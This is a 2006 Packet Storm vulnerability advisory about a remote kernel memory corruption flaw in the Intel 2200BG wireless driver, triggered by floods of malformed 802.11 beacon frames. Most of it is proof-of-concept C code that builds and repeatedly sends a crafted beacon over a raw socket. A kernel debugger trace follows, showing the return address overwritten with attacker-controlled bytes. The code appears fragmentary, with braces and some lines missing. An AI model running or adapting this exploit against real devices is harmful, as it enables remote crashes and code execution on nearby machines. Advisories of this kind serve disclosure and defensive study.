Type packetstorm
Reporter Johnny Cache
Modified 2006-12-21T00:00:00


                                            `Title: Intel 2200BG 802.11 Beacon frame Kernel Memory Corruption  
Description: The intel wireless mini-pci driver provided with Intel  
2200BG cards is vulnerable to a remote race condition memory  
corruption flaw.  
Malformed beacons frame can be used to corrupt internal kernel  
structures,leading to arbitrary code execution.  
This vulnerability is triggered when flooding wifi card with many  
malformed beacons frame.  
The data is copied over internal kernel structures, resulting in  
memory operations being performed on attacker-controlled pointer  
values, like EIP values.  
This vulnerability was found at Intel 2200 driver version  
Driver files:  
w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725  
w29mlres.dll 35afeccc4092b69f62d757c4707c74e9  
w29NCPA.dll 980f58b157baedc23026dd9302406bdd  
Author: Breno Silva Pinto (Open Communications Security /  
bsilva[at]sekure[dot]org) - Initial discovery and PoC  
Johnny Cache - help doing a working exploit  
Proof Of Concept:  
#include <unistd.h>  
#include <sys/types.h>  
#include <sys/socket.h>  
#include <sys/ioctl.h>  
#include <asm/types.h>  
#include <linux/if.h>  
#include <linux/if_packet.h>  
#include <linux/if_ether.h>  
#include <linux/if_arp.h>  
#include <netinet/in.h>  
#include <stdlib.h>  
#include <string.h>  
#include <stdio.h>  
#include <linux/wireless.h>  
// Change BSSID and SRC MAC ADDR to AP you are associated  
char beacon[] = { 0x80, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff,  
0x00, 0x18, 0x39, 0xe2, 0x12, 0xda,0x00, 0x18, 0x39, 0xe2, 0x12, 0xda,  
0x30, 0x2f, 0x84, 0x18, 0xa9, 0xf7, 0x00, 0x00, 0x00, 0x00, 0x64, 0x00,  
0x01, 0x04, 0x00, 0xff, 0x53, 0x41, 0x55, 0x4e, 0x41, 0x01, 0x08, 0x82,  
0x84, 0x8b,0x96, 0x24, 0x30, 0x48, 0x6c, 0x04, 0x01, 0x08, 0x05, 0x04,  
0x00, 0x01, 0x00, 0x00, 0x2a, 0x01,0x04, 0x2f, 0x01, 0x04, 0x32, 0x04,  
0x0c, 0x12, 0x18, 0x60, 0xdd, 0x06, 0x00, 0x10, 0x18, 0x02,0x00, 0xf4,  
0x08, 0xc1, 0xca, 0x93 };  
int main() {  
struct sockaddr_ll link;  
struct ifreq iface;  
int s, i, randd = 0x22, j, m, a, b;  
unsigned long len = 0, c = 0;  
char s_1[700+sizeof(beacon)];  
if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)  
return 0;  
if(ioctl(s,SIOCGIFHWADDR, &iface)) {  
return 0;  
if(ioctl(s,SIOCGIFINDEX, &iface)) {  
return -1;  
if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {  
return -1;  
link.sll_family = AF_PACKET;  
link.sll_ifindex = iface.ifr_ifindex;  
if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {  
return -1;  
randd = 0x44;  
s_1[37+i] = 0x44;  
for(;;) {  
i = 147;  
for(j=0;j<i;j++) {  
if(randd == 0xff)  
randd = 0x00;  
s_1[70+j] = randd++;  
randd = 0x44;  
for(m=0;m<5;m++) {  
len = sendto(s,s_1,strlen(beacon)+j, 0, NULL, 0);  
printf("Sent %d\n",len);  
return 0;  
Debugging Information:  
BugCheck D1, {402, 2, 0, f6806422}  
*** ERROR: Module load completed but symbols could not be loaded for  
Probably caused by : w29n51.sys ( w29n51+4e422 )  
Followup: MachineOwner  
kd> kv  
ChildEBP RetAddr Args to Child  
f7a92e68 f6806422 badb0d00 ffffffd2 00000000 nt!KiTrap0E+0x233 (FPO: [0,0]  
TrapFrame @ f7a92e68)  
WARNING: Stack unwind information not available. Following frames may be  
f7a92f24 5b5a5958 00000378 ffffffd2 015dcf64 w29n51+0x4e422  
f7a92f4c f67f56b5 8659feb0 01010077 00000000 0x5b5a5958  
f7a92f64 f67f2f09 8659f000 f7a92f94 f67de759 w29n51+0x3d6b5  
f7a92f70 f67de759 8659f000 4001000d 4001000d w29n51+0x3af09  
f7a92f94 f67cf873 86dc8568 86dc6888 00000000 w29n51+0x26759  
f7a92fa8 f67b938c 86dc6888 86bd1000 f7a92fd0 w29n51+0x17873  
f7a92fb8 f74aaf09 86bd1000 448a47c0 00000001 w29n51+0x138c  
f7a92fd0 804dbbd4 86dc8580 86dc856c 00000000 NDIS!ndisMDpcX+0x21 (FPO:  
f7a92ff4 804db89e f1751d54 00000000 00000000 nt!KiRetireDpcList+0x46 (FPO:  
f7a92ff8 f1751d54 00000000 00000000 00000000 nt!KiDispatchInterrupt+0x2a  
(FPO: [Uses EBP] [0,0,1])  
804db89e 00000000 00000009 bb835675 00000128 0xf1751d54  
Return address was overwrote with 0x5b5a5958.